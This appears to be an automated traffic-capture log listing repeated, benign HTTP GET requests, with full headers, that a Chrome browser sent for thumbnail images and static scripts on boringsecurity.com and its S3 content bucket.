Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_640,q_75/%2Fimages%2Fbrushed.jpg?url=%2Fimages%2Fbrushed.jpg&w=640&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET query missing.
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/twitter_dark.svg HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_baebee_15f9684169.jpg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Freeky_Crypto_29a0bbd006.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_3940_91e199a0b7.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_bc1_4d96972cb3.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_ispeaknerd_9fc9526715.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/twitter_dark.svg HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Jons_Doodley_Doo_9e4a536842.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_kfxape_034a85ee89.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_baebee_15f9684169.jpg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_kupi_5990bb8872.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/98-5331d5e48bc919a7.js HTTP/1.1Host: boringsecurity.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "c8d2668e8669284b4e536b5ba55392af-ssl"
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png&w=48&q=75 HTTP/1.1Host: boringsecurity.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_4073_1cb1c9b884.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Freeky_Crypto_29a0bbd006.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_916389a9b9dff2fff021cf2a62264925_537b20d36d.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_ispeaknerd_9fc9526715.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_poppunk_ac3f59a852.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_quit_b3e92694b1.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Jons_Doodley_Doo_9e4a536842.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_kfxape_034a85ee89.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_redzin_temp_1898f990e6.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_kupi_5990bb8872.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_MAYC_7e6a35562a.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_4073_1cb1c9b884.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_5_F_Ry_lya_400x400_c386fc238e.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_916389a9b9dff2fff021cf2a62264925_537b20d36d.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_toven_0ba71c0c46.png HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /thumbnail_Lazy_Lions_118_4a741f9816.jpeg HTTP/1.1Host: boring-security-cms.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://boringsecurity.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
